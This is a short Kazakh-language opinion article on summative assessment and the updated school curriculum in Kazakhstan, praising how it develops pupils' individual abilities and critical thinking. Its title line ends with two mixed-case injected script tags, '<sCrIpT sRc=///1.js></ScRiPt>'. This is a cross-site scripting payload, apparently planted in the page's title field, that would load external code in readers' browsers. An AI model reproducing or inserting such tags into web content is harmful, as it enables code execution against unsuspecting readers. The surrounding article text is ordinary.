Жиынтық бағалау баланың жеке қабілетін ашуға көмектеседі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Жаңартылған оқу бағдарламасы бойынша оқушылардың білімінің, ой-өрісінің шарықтауына өте көп тиімді екеніне практика, жұмыс жасау барысында көзіміз жетті. Себебі бұрын оқушылардың барлық білімі белгілі бір қалыпқа салып берілген болса, қазір нақты жауап жоқ, ол оқушының ой-өрісінің шарықтауына байланысты. Әр баланың жеке қабілетін ашуға көмектеседі. Ұстаздар қойған сұраққа оқушылар жалғыз жауаппен құтылмай, әрбірі өз ізденісіне қарай оқулықта жоқ тың ақпаратпен бөлісуді құп көреді. «Осы арқылы балалар өздерін жаңа қырынан тануға мүмкіндік алып, сын тұрғыда ойлана алады
Жаңартылған білім мазмұнына бүгінгі күні біздің Қазақстан Республикасында 11-сыныптан өзге сыныптардың бәрі толығымен өтті деп айтуымызға болады. Бүгінгі талапқа сәйкес ақпараттандыру заманында оқушыларымыздың ойы бүгінде өзгеше қалыптасып, интернет жүйесіне шығу арқылы бүгінгі күні біздің балаларымыз ол кездегі оқушылармен салыстырғанда әлдеқайда алға қарай дамыған. Әлбетте, сын түзелмей мін түзелмейтіні рас. «Отандық білім саласына қатысты айтылып жатқан сындарды Білім және ғылым министрлігі де назардан тыс қалдырмауға тырысып жатыр деп есептеймін.
Аканова А.Р.